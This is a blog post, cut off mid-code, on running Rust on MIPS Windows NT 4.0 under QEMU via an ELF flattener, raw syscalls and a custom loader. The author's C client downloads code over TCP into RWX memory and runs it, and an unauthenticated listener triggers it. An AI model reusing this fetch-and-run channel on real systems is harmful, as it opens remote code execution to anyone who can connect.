
Rust on MIPS64 Windows NT 4.0

16 November 2021 at 07:00

Introduction

Some part of me has always been fascinated with coercing code to run in weird places. I scratch this itch a lot with my security research projects. These often lead me to writing shellcode to run in kernels or embedded hardware, sometimes with the only way being through an existing bug.

For those not familiar, shellcode is honestly hard to describe. I don’t know if there’s a very formal definition, but I’d describe it as code which can be run in an environment without any external dependencies. This often means it’s written directly in assembly, and directly interfaces with the system using syscalls. Usually the code can be relocated and often is represented as a flat image rather than a normal executable with multiple sections.

To me, this is extra fun as it’s effectively like operating systems development. You’re working in an environment where you need to bring most of what you need along with you. You probably want to minimize the dependencies you have on the system and libraries to increase compatibility and flexibility with the environments you run. You might have to bring your own allocator, make your own syscalls, maybe even make a scheduler if you are really trying to minimize impact.

Some of these things may seem silly, but when it comes to bypassing anti-viruses, exploit detection tools, and even mitigations, often the easiest thing to do is just avoid the common APIs that are hooked and monitored.

Streams

Before we get into it, it’s important to note that this work has been done over 3 different live streams on my Twitch! You can find these archived on my YouTube channel. Everything covered in this blog can be viewed as it happened in real time, mistakes, debugging, and all!

The 3 videos in question are:

Day 1 - Getting Rust running on Windows NT 4.0 MIPS64

Day 2 - Adding memory management and threading to our Rust on Windows NT MIPS

Day 3 - Causing NT 4.0 MIPS to bluescreen without even trying

Source

This project has spun off 3 open-source GitHub repos, one for the Rust on NT MIPS project in general, another for converting ELFs to flat images, and a final one for parsing .DBG symbol files for applying symbols to Binary Ninja or whatever tool you want symbols in! I’ve also documented the commit hashes for the repos as of this writing, in case things have changed by the time you read this!

Rust on NT MIPS - 2028568

ELF loader - 30c77ca

DBG COFF parser - b7bcdbb

Don’t forget to follow me on socials and like and subscribe of course. Maybe eventually I can do research and education full time!~ Oh, also follow me on my Twitter @gamozolabs

MIPS on Windows NT

Windows NT actually has a pretty fascinating history of architecture support. It supported x86 as we know and love, but additionally it supported MIPS, Alpha, and PowerPC (and, much more recently, ARM). If you include the embedded versions of Windows there’s support for some even more exotic architectures.

MIPS is one of my favorite architectures as the simplicity makes it really fun to develop emulators for. As someone who writes a lot of emulators, it’s often one of my first targets during development, as I know it can be implemented in less than a day of work. Finding out that MIPS NT can run in QEMU was quite exciting for me. The first time I played around with this was maybe ~5 years ago, but recently I thought it’d be a fun project to demonstrate harnessing of targets for fuzzing. Not only does it have some hard problems in harnessing, as there are almost no existing tools for working with MIPS NT binaries, but it also leads us to some fun future projects where custom emulators can come into the picture!

There’s actually a fantastic series by Raymond Chen which I highly recommend you check out here.

There are actually a few of these series by Raymond for various architectures on NT. They don’t pull any punches on details; definitely a fantastic read!

Running Windows NT 4.0 MIPS in QEMU

Getting NT 4.0 running in QEMU honestly isn’t too difficult. QEMU already supports the magnum machine, which uses an R4000 MIPS processor, the first 64-bit MIPS processor, implementing the MIPS III ISA. Unfortunately, out of the box it won’t quite run, as you need a BIOS/bootloader capable of booting Windows (maybe it’s a video BIOS, I don’t know). You can find this here. Simply extract the file, and rename NTPROM.RAW to mipsel_bios.bin.

Other than that, QEMU will be able to just run NT 4.0 out of the box. There’s a bit of configuration you need to do in the BIOS to get it to detect your CD, and you need to configure your MAC address otherwise networking in NT doesn’t seem to work beyond a DHCP lease. Anyways, you can find more details about getting MIPS NT 4.0 running in QEMU here.

I also cover the process I use, and include my run.sh script here.

#!/bin/sh

ISO="winnt40wks_sp1_en.iso"
#ISO="./Microsoft Visual C++ 4.0a RISC Edition for MIPS (ISO)/VCPP-4.00-RISC-MIPS.iso"

qemu-system-mips64el \
    -M magnum \
    -cpu VR5432 \
    -m 128 \
    -net nic \
    -net user,hostfwd=tcp::5555-:42069 \
    -global ds1225y.filename=nvram \
    -global ds1225y.size=8200 \
    -L . \
    -hda nt4.qcow2 \
    -cdrom "$ISO"

Windows NT 4.0 running in QEMU MIPS

Getting code running on Windows NT 4.0

Surprisingly, a decent enough environment for development is readily available for NT 4.0 on MIPS. This includes symbols (included under SUPPORT/DEBUG/MIPS/SYMBOLS on the original ISO), as well as debugging tools such as ntsd, cdb and mipskd (command-line versions of the WinDbg command interface you may be familiar with), and the cherry on top is a fully working Visual Studio 4.0 install that will work right inside the MIPS guest!

With Visual Studio 4.0 we can use both the full IDE experience for building projects and the command line cl.exe compiler and nmake, my preferred Windows development experience. I did however use VS4 for the editor, as I’m not using 1996 notepad.exe for writing code!

Unless you’re doing something really fancy, you’ll be surprised to find how many of the NT APIs just work out of the box on NT4. This includes your standard way of interacting with sockets, threads, process manipulation, etc. A few years ago I wrote a snapshotting tool that used all the same APIs I would use in a modern tool to dump virtual memory regions, read them, and read register contexts. It’s pretty neat!

Nevertheless, if you’re writing C or C++, other than maybe forgetting about variables having to be declared at the start of a scope, or not using your bleeding edge Windows 10 APIs, it’s really no different from modern Windows development. At least… for low level projects.

Rust and Me

After about ~10 years of writing -ansi -pedantic C, where I followed all the old fashioned rules of declaring variables at the start of scopes, verbose syntax, etc, I never would have thought I would find myself writing in a higher-level language. I dabbled in C++ but I really didn’t like the abstractions and confusion it brought, although that was arguably when I was a bit less experienced.

Nevertheless, I found myself absolutely falling in love with Rust. This was a pretty big deal for me as I have very strong requirements about understanding exactly what sort of assembly is generated from the code I write. I spend a lot of time optimizing and squeezing every bit of performance out of my code, and not having this would ruin a language for me. Something about Rust and its model of abstractions (traits) makes it actually pretty obvious what code will be generated, even for things like generics.

The first project I did in Rust was porting my hobby OS to it. Definitely a “thrown into the deep end” style project, but if Rust wasn’t suitable for operating systems development, it definitely wasn’t going to be a language I personally would want to invest in. However… it honestly worked great. After reading the Rust book, I was able to port my OS which consisted of a small hypervisor, 10gbit networking stack, and some fancy memory management, in less than a week.

Anyways, rant aside, as a low-level optimization nerd, there was nothing about Rust, even in 2016, that raised red flags about being able to replace all of my C in it. Of course, I have many complaints and many things I would change or want added to Rust, but that’s going to be the case with any language… I’m picky.

Rust on MIPS NT 4.0

Well, I do all of my projects in Rust now. Even little scripts I’d usually write in Python I often find myself grabbing Rust for. I’m comfortable enough using Rust for pretty much any project at this point that I decided that for a long-ish term stream project (ultimately a snapshot fuzzer for NT), I would want to do it in Rust.

The very first thought that comes to mind is to just build a MIPS executable from Rust, and just… run it. Well, that would be great, but unfortunately there were a few hiccups.

Rust on weird targets

Rust actually has pretty good support for weird targets. I mean, I guess we’re really just relying on, or limited by, cough, LLVM. Not only can you simply pick your target by the --target triple argument to Rust and Cargo, but also when you really need control you can define a target specification. This gives you a large amount of control over the code that gets generated.

For example:

pleb@gamey ~ $ rustc -Z unstable-options --print target-spec-json

Will give you the JSON spec for my native system, x86_64-unknown-linux-gnu

{
  "arch": "x86_64",
  "cpu": "x86-64",
  "crt-static-respected": true,
  "data-layout": "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128",
  "dynamic-linking": true,
  "env": "gnu",
  "executables": true,
  "has-elf-tls": true,
  "has-rpath": true,
  "is-builtin": true,
  "llvm-target": "x86_64-unknown-linux-gnu",
  "max-atomic-width": 64,
  "os": "linux",
  "position-independent-executables": true,
  "pre-link-args": {
    "gcc": [
      "-m64"
    ]
  },
  "relro-level": "full",
  "stack-probes": {
    "kind": "call"
  },
  "supported-sanitizers": [
    "address",
    "cfi",
    "leak",
    "memory",
    "thread"
  ],
  "target-family": [
    "unix"
  ],
  "target-pointer-width": "64"
}

As you can see, there’s a lot of control you have here. There’s plenty more options than just in this JSON as well. You can adjust your ABIs, data layout, calling conventions, output binary types, stack probes, atomic support, and so many more. This JSON can be modified as you need and you can then pass in the JSON as --target <your target json.json> to Rust, and it “just works”.

I’ve used this to generate code for targets Rust doesn’t support, like Android on MIPS (okay there’s maybe a bit of a pattern to my projects here).

Back to Rust on MIPS NT

Anyways, back to Rust on MIPS NT. Let’s just make a custom spec and get LLVM to generate us a nice portable executable (PE, the .exe format of Windows)!

Should be easy!

Well… after about ~4-6 hours of tinkering. No. No it is not. In fact, we ran into an LLVM bug.

It took us some time (well, Twitch chat eventually read the LLVM code instead of me guessing) to find that the correct target triple if we wanted to get LLVM to generate a PE for MIPS would be mips64el-pc-windows-msvccoff. It’s a weird triple (mainly the coff suffix), but this is the only path we were able to find which would cause LLVM to attempt to generate a PE for MIPS. It definitely seems a bit biased towards making an ELF, but this triple indeed works…

It works at getting LLVM to try to emit a PE, but unfortunately this feature is not implemented. Specifically, inside LLVM they will generate the MIPS code, and then attempt to create the PE by calling createMCObjectStreamer. This function doesn’t actually check any of the function pointers before invoking them, and it turns out that the COFF streamer defaults to NULL, and for MIPS it’s not implemented.

Thus… we get a friendly jump to NULL:

LLVM crash backtrace in GDB

Can we add support?

The obvious answer is to quickly take the generic implementation of PE generation in LLVM and make it work for MIPS and upstream it. Well, after a deep 30 second analysis of LLVM code, it looks like this would be more work than I wanted to invest, and after all the issues up to this point my concerns were that it wouldn’t be the end of the problems.

I guess we have ELFs

Well, that leaves us with really one format that LLVM will generate MIPS for us, and that’s ELFs. Luckily, I’ve written my fair share of ELF loaders, and I decided the best way to go would simply be to flatten the ELF into an in-memory representation and make my own file format that’s easy to write a loader for.

You might think to just use a linker script for this, or to do some magic objcopy to rip out code, but unfortunately both of these have limitations. Linker scripts are fail-open, meaning if you do not specify what happens with a section, it will just “silently” be added wherever the linker would have put it by default. There is (to my knowledge) no strict mode, which means if Rust or LLVM decide to emit some section name you are not expecting, you might end up with code not being laid out as you expect.

objcopy cannot output zero-initialized BSS sections as they would be represented in-memory, so once again, this leads to an unexpected section popping up and breaking the model you expected.

Of course, with enough effort and being picky you can get a linker script to output whatever format you want, but honestly they kinda just suck to write.

Instead, I decided to just write an ELF flattener. It wouldn’t handle relocations, imports, exports, permissions or really anything. It wouldn’t even care about the architecture of the ELF or the payload. Simply, go through each LOAD section, place them at their desired address, and pad the space between them with zeros. This will give a flat in-memory representation of the binary as it would be loaded without relocations. It doesn’t matter if there’s some crazy custom assembly or sections defined, the LOAD sections are all that matters.

This tool is honestly relatively valuable for other things, as it can also flatten core dumps (which are also ELFs) into a flat file if you want to inspect them with your own tooling. I’ve written this ELF loader a handful of times before, so I thought it would be worthwhile writing my best version of it.

The loader simply parses the absolutely required information from the ELF. This includes checking \x7FELF magic, reading the endianness (affects the ELF integer endianness), and the bitness (also affects ELF layout). Any other information in the header is ignored. Then I parse the program headers, look for any LOAD sections (sections indicated by the ELF to be loaded into memory) and make the flat file.

The ELF format is fairly simple, and the LOAD sections contain information about the permissions, virtual address, virtual size (in-memory size), file offset (location of data to initialize the memory to), and the file size (can often be less than the memory size, thus any uninitialized bytes are padded to virtual memory size with zeros).

By concatenating these sections with the correct padding, voila, we have an in-memory representation of the ELF.
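
As a rough illustration of that flattening step, here’s a minimal sketch (my own, not the actual elfloader code), assuming the LOAD program headers have already been parsed out into their virtual address, memory size, and file bytes:

/// A parsed LOAD segment: virtual address, in-memory size, and the
/// initialized bytes from the file (the file size may be smaller than the
/// memory size; the remainder is zero-filled BSS)
struct Load { vaddr: u64, memsz: u64, data: Vec<u8> }

/// Flatten LOAD segments into (base address, flat image), padding any gaps
/// between segments (and BSS tails) with zero bytes
fn flatten(mut loads: Vec<Load>) -> Option<(u64, Vec<u8>)> {
    loads.sort_by_key(|l| l.vaddr);
    let base = loads.first()?.vaddr;
    let mut image = Vec::new();

    for l in &loads {
        // Zero-pad from the end of the image up to this segment's address
        let off = (l.vaddr - base) as usize;
        if off < image.len() { return None; } // overlapping segments
        image.resize(off, 0);

        // Initialized file bytes, then zero-fill out to the in-memory size
        image.extend_from_slice(&l.data);
        image.resize(off + l.memsz as usize, 0);
    }

    Some((base, image))
}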

I decided to make a custom FELF (“Falk ELF”) format that indicates where this blob needs to be loaded into memory, and the entry point address to jump to in order to start execution.

FELF0001 - Magic header
entry    - 64-bit little endian integer of the entry point address
base     - 64-bit little endian integer of the base address to load the image
<image>  - Rest of the file is the raw image, to be loaded at `base` and jumped
           into at `entry`

Simple! You can find the source code to this tool at My GitHub for elfloader. This tool also has support for making a raw file, and picking a custom base, not for relocations, but for padding out the image. For example, if you have the core dump of a QEMU guest, you can run it through this tool with elfloader --binary --base=0 <coredump> and it will produce a flat file with no headers representing all physical memory, with MMIO holes and gaps padded with zero bytes. You can then mmap() the file and write your own tools to browse through a guest’s physical memory (or virtual if you write page table walking code)! Maybe this is a problem only I run into often, but within a few days of writing this I’ve even had a coworker use it.
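
For reference, pulling the header back apart is just as easy; here’s a minimal parsing sketch (again mine, not code from the tool), following the layout above:

/// Split a FELF blob into (entry, base, raw image), per the layout above
fn parse_felf(felf: &[u8]) -> Option<(u64, u64, &[u8])> {
    // 8-byte magic followed by two little-endian u64s: entry and base
    if felf.len() < 24 || &felf[..8] != b"FELF0001" {
        return None;
    }

    let mut word = [0u8; 8];
    word.copy_from_slice(&felf[8..16]);
    let entry = u64::from_le_bytes(word);
    word.copy_from_slice(&felf[16..24]);
    let base = u64::from_le_bytes(word);

    // Everything else is the raw image, loaded at `base`, started at `entry`
    Some((entry, base, &felf[24..]))
}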

Anyways, enough selling you on this first cool tool we produced. We can turn an ELF into an in-memory initial representation, woohoo.

FELF loader

To load a FELF for execution on Windows, we’ll of course need to write a loader. Of course we could convert the FELF into a PE, but at this point it’s less effort for us to just use the VC4.0 installation in our guest to write a very tiny loader. All we have to do is read a file, parse a simple header, VirtualAlloc() some RWX memory at the target address, copy the payload to the memory, and jump to entry!

Unfortunately, this is where it started to get dicey. I don’t know if it’s my window manager, QEMU, or Windows, but very frequently my mouse would start randomly jumping around in the VM. This meant that I pretty much had to do all of my development and testing in the VM with only the keyboard. So, we immediately scrapped the idea of loading a FELF from disk, and went for network loading.

Remote code execution

As long as we configured a unicast MAC address in our MIPS BIOS (yeah, we learned the hard way that non-unicast MAC addresses randomly generated by DuckDuckGo indeed fail in a very hard to debug way), we had access to our host machine (and the internet) in the guest.

Why load from disk, which would require shutting down the VM to mount the disk and copy the file onto it, when we could just make this a remote loader? So, that’s what we did!

We wrote a very simple client that when invoked, would connect to the server, download a FELF, load it, and execute it. This was small enough that developing this inside the VM in VC4.0 was totally fine.

#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

int
main(void)
{
	SOCKET sock;
	WSADATA wsaData;
	unsigned int len;
	unsigned char *buf;
	unsigned int off = 0;
	struct sockaddr_in sockaddr = { 0 };

	// Initialize WSA
	if(WSAStartup(MAKEWORD(2, 0), &wsaData)) {
		fprintf(stderr, "WSAStartup() error : %d", WSAGetLastError());
		return -1;
	}

	// Create TCP socket
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock == INVALID_SOCKET) {
		fprintf(stderr, "socket() error : %d", WSAGetLastError());
		return -1;
	}

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_addr.s_addr = inet_addr("192.168.1.2");
	sockaddr.sin_port = htons(1234);

	// Connect to the socket
	if(connect(sock, (const struct sockaddr*)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR) {
		fprintf(stderr, "connect() error : %d", WSAGetLastError());
		return -1;
	}

	// Read the payload length
	if(recv(sock, (char*)&len, sizeof(len), 0) != sizeof(len)) {
		fprintf(stderr, "recv() error : %d", WSAGetLastError());
		return -1;
	}

	// Read the payload
	buf = malloc(len);
	if(!buf) {
		perror("malloc() error ");
		return -1;
	}

	while(off < len) {
		int bread;
		unsigned int remain = len - off;
		bread = recv(sock, buf + off, remain, 0);
		if(bread <= 0) {
			fprintf(stderr, "recv(pl) error : %d", WSAGetLastError());
			return -1;
		}

		off += bread;
	}

	printf("Read everything %u\n", off);

	// FELF0001 + u64 entry + u64 base
	if(len < 3 * 8) {
		fprintf(stderr, "Invalid FELF\n");
		return -1;
	}

	{
		char *ptr = buf;
		unsigned int entry, base, hi, end;

		if(memcmp(ptr, "FELF0001", 8)) {
			fprintf(stderr, "Missing FELF header\n");
			return -1;
		}
		ptr += 8;

		entry = *((unsigned int*)ptr)++;
		hi = *((unsigned int*)ptr)++;
		if(hi) {
			fprintf(stderr, "Unhandled 64-bit address\n");
			return -1;
		}

		base = *((unsigned int*)ptr)++;
		hi = *((unsigned int*)ptr)++;
		if(hi) {
			fprintf(stderr, "Unhandled 64-bit address\n");
			return -1;
		}

		end = base + (len - 3 * 8);
		printf("Loading at %x-%x (%x) entry %x\n", base, end, end - base, entry);

		{
			unsigned int align_base = base & ~0xffff;
			unsigned int align_end  = (end + 0xffff) & ~0xffff;
			char *alloc = VirtualAlloc((void*)align_base,
				align_end - align_base, MEM_COMMIT | MEM_RESERVE,
				PAGE_EXECUTE_READWRITE);
			printf("Alloc attempt %x-%x (%x) | Got %p\n",
				align_base, align_end, align_end - align_base, alloc);
			if(alloc != (void*)align_base) {
				fprintf(stderr, "VirtualAlloc() error : %d\n", GetLastError());
				return -1;
			}

			// Copy in the code
			memcpy((void*)base, ptr, end - base);
		}

		// Jump to the entry
		((void (*)(SOCKET))entry)(sock);
	}

	return 0;
}

It’s not the best quality code, but it gets the job done. Nevertheless, this allows us to run whatever Rust program we develop in the VM! Running this client executable is all we need now.

Remote remote code execution

Unfortunately, having to switch to the VM, hit up arrow, and enter, is honestly a lot more than I want to have in my build process. I kind of think any build, dev, and test cycle that takes longer than a few seconds is just too painful to use. I don’t really care how complex the project is. In Chocolate Milk I demonstrated that I could build, upload to my server, hot replace, download Windows VM images, and launch hundreds of Windows VMs as part of my sub-2-second build process. This is an OS and hypervisor with hotswapping and re-launching of hundreds of Windows VMs in seconds (I think milliseconds for the upload, hot swap, and Windows VM launches if you ignore the 1-2 second Rust build). There’s just no excuse for shitty build and test processes for small projects like this.

Okay, very subtle flex aside, we need a better process. Luckily, we can remotely execute our remote code. To do this I created a server that runs inside the guest that waits for connections. On a connection it simply calls CreateProcess() and launches the client we talked about before. Now, we can “poke” the guest by simply connecting and disconnecting to the TCP port we forwarded.

#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>

int
main(void)
{
	SOCKET sock;
	WSADATA wsaData;
	struct sockaddr_in sockaddr = { 0 };

	// Initialize WSA
	if(WSAStartup(MAKEWORD(2, 0), &wsaData)) {
		fprintf(stderr, "WSAStartup() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Create TCP socket
	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(sock == INVALID_SOCKET) {
		fprintf(stderr, "socket() error : %d\n", WSAGetLastError());
		return -1;
	}

	sockaddr.sin_family = AF_INET;
	sockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
	sockaddr.sin_port = htons(42069);

	if(bind(sock, (const struct sockaddr*)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR) {
		fprintf(stderr, "bind() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Listen for connections
	if(listen(sock, 5) == SOCKET_ERROR) {
		fprintf(stderr, "listen() error : %d\n", WSAGetLastError());
		return -1;
	}

	// Wait for a client
	for( ; ; ) {
		STARTUPINFO si = { 0 };
		PROCESS_INFORMATION pi = { 0 };
		SOCKET client = accept(sock, NULL, NULL);

		// Upon getting a TCP connection, just start
		// a separate client process. This way the
		// client can crash and burn and this server
		// stays running just fine.
		CreateProcess(
			"client.exe",
			NULL,
			NULL,
			NULL,
			FALSE,
			CREATE_NEW_CONSOLE,
			NULL,
			NULL,
			&si,
			&pi
		);

		// We don't even transfer data, we just care about
		// the connection kicking off a client.
		closesocket(client);
	}

	return 0;
}

Very fancy code. Anyways, with this in place, we can just add a nc -w 0 127.0.0.1 5555 to our Makefile, and now the VM will download and run the new code we build. Combine this with cargo watch and now when we save one of the Rust files we’re working on, it’ll build, poke the VM, and run it! A simple :w and we have instant results from the VM!

(If you’re wondering, we create the client in a different process so we don’t lose the server if the client crashes, which it will)

Rust without OS support

Rust is designed to have a split of some of the core features of the language. There’s core which contains the bare essentials to have a usable language, alloc which gives you access to dynamic allocations, and std which gives you an OS-agnostic wrapper of common OS-level constructs like files, threads, and sockets.

Unfortunately, Rust doesn’t have support for NT4.0 on MIPS, so we immediately don’t have the ability to use std. However, we can still use core and alloc with a small amount of work.

Rust has some of the best cross-compilation support of any compiler, as you can simply have Rust build core for your target, even if you don’t have the pre-compiled package. core is simple enough that it builds in a few seconds, so it doesn’t really complicate your build. Seriously, look how cool this is:

cargo new --bin rustexample

#![no_std]
#![no_main]

#[panic_handler]
fn panic_handler(_info: &core::panic::PanicInfo) -> ! {
    loop {}
}

#[no_mangle]
pub unsafe extern fn __start() -> ! {
    unimplemented!();
}
pleb@gamey ~/rustexample $ cargo build --target mipsel-unknown-none -Zbuild-std=core
   Compiling core v0.0.0 (/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/core)
   Compiling compiler_builtins v0.1.49
   Compiling rustc-std-workspace-core v1.99.0 (/home/pleb/.rustup/toolchains/nightly-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/rustc-std-workspace-core)
   Compiling rustexample v0.1.0 (/home/pleb/rustexample)
    Finished dev [unoptimized + debuginfo] target(s) in 8.84s

And there you go, you have a Rust binary for mipsel-unknown-none without having to download any pre-built toolchains, a libc, anything. You can immediately start building your program, using Rust-level constructs like slices and arrays with bounds checking, closures, whatever. No libc, no pre-built target-specific toolchains, nothing.

OS development in user-land

For educational reasons, and totally not because I just find it more fun, I decided that this project would not leverage the existing C libraries we have that do indeed exist in the MIPS guest. We could of course write PE importers to leverage the existing kernel32.dll and user32.dll present in all Windows processes by default, but no, that’s not fun. We can justify this by saying that the goal of this project is to fuzz the NT kernel, and thus we need to understand what syscalls look like.

So, with that in mind, we’re basically on our own. We’re effectively writing an OS in user-land, as we have absolutely no libraries or features by default. We have to write our own inline assembly and work with raw pointers to bootstrap our execution environment for Rust.

The very first thing we need is a way of outputting debug information. I don’t care how we do this. It could be a file, a socket, the stdout, who cares. To do this, we’ll need to ask the kernel to do something via a syscall.

Syscall Layer

To invoke syscalls, we need to conform to a somewhat “custom” calling convention. System calls effectively are always indexed by some integer, selecting the API that you want to invoke. In the case of MIPS this is put into the $v0 register, which is not normally used in the calling convention. Thus, to perform a syscall with this modified convention, we have to use some assembly. Luckily, the rest of the calling convention for syscalls is unmodified from the standard MIPS o32 ABI, and we can pass through everything else.

To pass everything as-is to the syscall, we have to make sure Rust is using the same ABI as the kernel. We do this by declaring our function as extern, which switches us to the default MIPS o32 C ABI. Technically I think Windows does floating point register passing differently than o32, but we’ll cross that bridge when we get there.

We need to be confident that the compiler is not emitting some weird prologue or moving around registers in our syscall function, and luckily Rust comes to the rescue again with a #[naked] function decorator. This marks the function as never inline-able, but also guarantees that no prologue or epilogue is present in the function. This is common in a lot of low level languages, but Rust goes a step further and requires that naked functions only contain a single assembly statement that must not return (you must manually handle the return), and that your assembly is the first code that executes. Ultimately, it’s really just a global label on inline assembly with type information. Sweet.

So, we simply have to write a syscall helper for each number of arguments we want to support like such:

/// 2-argument syscall
#[allow(unused)]
#[naked]
pub unsafe extern fn syscall2(_: usize, _: usize, id: usize) -> usize {
    asm!(r#"
        move $v0, $a2
        syscall
    "#, options(noreturn));
}

We mark the function as naked, pass in the syscall ID as the last parameter (so as to not disturb the ordering of the earlier parameters, which we pass through to the syscall), move the syscall ID to $v0, and invoke the syscall. Weirdly, for MIPS, the syscall does not return to the instruction after the syscall; it actually returns to $ra, the return address, so it’s critical that the function is never inlined, as this wrapper relies on returning back to the call site in the caller of syscall2(). Luckily, naked ensures this for us, and thus this wrapper is sufficient for syscalls!
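
For instance, a one-argument variant follows the exact same pattern; this is my own sketch (the post only shows syscall2), with the ID landing in $a1 since it’s the second parameter:

/// 1-argument syscall
#[allow(unused)]
#[naked]
pub unsafe extern fn syscall1(_: usize, id: usize) -> usize {
    asm!(r#"
        move $v0, $a1
        syscall
    "#, options(noreturn));
}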

Getting output

Back to the console: we initially started by trying to do stdout, but according to Twitch chat it sounds like on old Windows this was actually done via some RPC with conhost. So, we abandoned that. We wrote a tiny example of using the NtOpenFile() and NtWriteFile() syscalls to drop a log file to disk, and this was a cool example of early syscalls, but still not convenient.

Remember, I’m picky about the development cycle.

So, we decided to go with a socket for our final build. Unfortunately, creating a socket in Windows via syscalls is actually pretty hard (I think it’s done mainly over IOCTLs), but we cheated here and just passed along the handle from the FELF loader, which already had to connect to our host. We can simply change our FELF server to serve the FELF to the VM and then recv() forever, printing out the console output. Now we have remote console output.
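
The post doesn’t show how the handle actually reaches the Rust side, but since the C client above jumps to the entry point with the connected socket as its only argument, the entry stub presumably just stashes it somewhere the print machinery can reach. A purely hypothetical sketch (the Handle newtype and main() signature come from later snippets; the rest is an assumption):

/// Socket handle passed in by the FELF loader; used by `print!()`'s `Writer`
pub static mut SOCKET: Handle = Handle(0);

#[no_mangle]
pub unsafe extern fn __start(sock: usize) -> ! {
    // The loader jumps to `entry` with the already-connected socket as the
    // first argument, so save it for our console output
    SOCKET = Handle(sock);

    // Hand off to the real program
    let _ = crate::main();

    // A real implementation would exit cleanly here; this sketch just parks
    loop {}
}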

Windows Syscalls

Windows syscalls are a lot heavier than what you might be used to on UNIX, and they are also sometimes undocumented. Luckily, the NtWriteFile() syscall that we really need is actually not too bad. It takes a file handle, some optional stuff we don’t care about, an IO_STATUS_BLOCK (which returns the number of bytes written), a buffer, a length, and an offset in the file to write to.

/// Write to a file
pub fn write(fd: &Handle, bytes: impl AsRef<[u8]>) -> Result<usize> {
    let mut offset = 0u64;
    let mut iosb = IoStatusBlock::default();

    // Perform syscall
    let status = NtStatus(unsafe {
        syscall9(
            // [in] HANDLE FileHandle
            fd.0,

            // [in, optional] HANDLE Event
            0,

            // [in, optional] PIO_APC_ROUTINE ApcRoutine,
            0,

            // [in, optional] PVOID ApcContext,
            0,

            // [out] PIO_STATUS_BLOCK IoStatusBlock,
            addr_of_mut!(iosb) as usize,

            // [in] PVOID Buffer,
            bytes.as_ref().as_ptr() as usize,

            // [in] ULONG Length,
            bytes.as_ref().len(),

            // [in, optional] PLARGE_INTEGER ByteOffset,
            addr_of_mut!(offset) as usize,

            // [in, optional] PULONG Key
            0,

            // Syscall number
            Syscall::WriteFile as usize)
    } as u32);

    // If success, return number of bytes written, otherwise return error
    if status.success() {
        Ok(iosb.information)
    } else {
        Err(status)
    }
}

Rust print!() and formatting

To use Rust in the best way possible, we want to have support for the print!() macro, the printf() of the Rust world. It happens to be really easy to add support for!

/// Writer structure that simply implements [`core::fmt::Write`] such that we
/// can use `write_fmt` in our [`print!`]
pub struct Writer;

impl core::fmt::Write for Writer {
    fn write_str(&mut self, s: &str) -> core::fmt::Result {
        let _ = crate::syscall::write(unsafe { &SOCKET }, s);

        Ok(())
    }
}

/// Classic `print!()` macro
#[macro_export]
macro_rules! print {
    ($($arg:tt)*) => {
        let _ = core::fmt::Write::write_fmt(
            &mut $crate::print::Writer, core::format_args!($($arg)*));
    }
}

Simply create a dummy structure, implement core::fmt::Write on it, and now you can directly use Write::write_fmt() to write format strings. All you have to do is implement a sink for &strs, which is really just a char* and a length. In our case, we invoke the NtWriteFile() syscall with our socket we saved from the client.
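
The post only shows print!(), but the println!() used in the examples below is the obvious next step; a minimal sketch, following the classic pre-2018 std approach of appending a newline to the format string:

/// Classic `println!()` macro: just `print!()` with a trailing newline
#[macro_export]
macro_rules! println {
    () => { $crate::print!("\n"); };
    ($fmt:expr) => { $crate::print!(concat!($fmt, "\n")); };
    ($fmt:expr, $($arg:tt)*) => {
        $crate::print!(concat!($fmt, "\n"), $($arg)*);
    };
}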

Voila, we have remote output in a nice development environment:

fn main() -> Result<(), ()> {
    println!("Hello world from Rust at {:#x}", main as usize);
    Ok(())
}

pleb@gamey ~/mipstest $ felfserv 0.0.0.0:1234 ./out.felf

Serving 6732 bytes to 192.168.1.2:45914
---------------------------------
Hello world from Rust at 0x13370790

It’s that easy!

Memory allocation

Now that we have the basic ability to print things and use Rust, the next big feature that we’re missing is the ability to dynamically allocate memory. Luckily, we talked about the alloc feature of Rust before. Now, alloc isn’t something you get for free. Rust doesn’t know how to allocate memory in the environment you’re running it in, so you need to implement an allocator.

Luckily, once again, Rust is really friendly here. All you have to do is implement the GlobalAlloc trait on a global structure. You implement an alloc() function which takes in a Layout (size and alignment) and returns a *mut u8 (null on failure). Then you have a dealloc() where you get the pointer that was used for the allocation and the Layout again (it’s actually really nice to know the size of the allocation at free() time), and that’s it.

Since we don’t care too much about the performance of our dynamic allocator, we’ll just pass this information through directly to the NT kernel by doing virtual memory maps and frees.

use alloc::alloc::{Layout, GlobalAlloc};

/// Implementation of the global allocator
struct GlobalAllocator;

/// Global allocator object
#[global_allocator]
static GLOBAL_ALLOCATOR: GlobalAllocator = GlobalAllocator;

unsafe impl GlobalAlloc for GlobalAllocator {
    unsafe fn alloc(&self, layout: Layout) -> *mut u8 {
        crate::syscall::mmap(0, layout.size()).unwrap_or(core::ptr::null_mut())
    }
    
    unsafe fn dealloc(&self, addr: *mut u8, _layout: Layout) {
        crate::syscall::munmap(addr as usize)
            .expect("Failed to deallocate memory");
    }
}

As for the syscalls, they’re honestly not too bad here either, so I won’t go into more detail. You’ll notice these are similar to VirtualAlloc(), which is a common API in Windows development.

/// Allocate virtual memory in the current process
pub fn mmap(mut addr: usize, mut size: usize) -> Result<*mut u8> {
    /// Commit memory
    const MEM_COMMIT: u32 = 0x1000;

    /// Reserve memory range
    const MEM_RESERVE: u32 = 0x2000;

    /// Readable and writable memory
    const PAGE_READWRITE: u32 = 0x4;

    // Perform syscall
    let status = NtStatus(unsafe {
        syscall6(
            // [in] HANDLE ProcessHandle,
            !0,

            // [in, out] PVOID *BaseAddress,
            addr_of_mut!(addr) as usize,

            // [in] ULONG_PTR ZeroBits,
            0,

            // [in, out] PSIZE_T RegionSize,
            addr_of_mut!(size) as usize,

            // [in] ULONG AllocationType,
            (MEM_COMMIT | MEM_RESERVE) as usize,

            // [in] ULONG Protect
            PAGE_READWRITE as usize,

            // Syscall ID
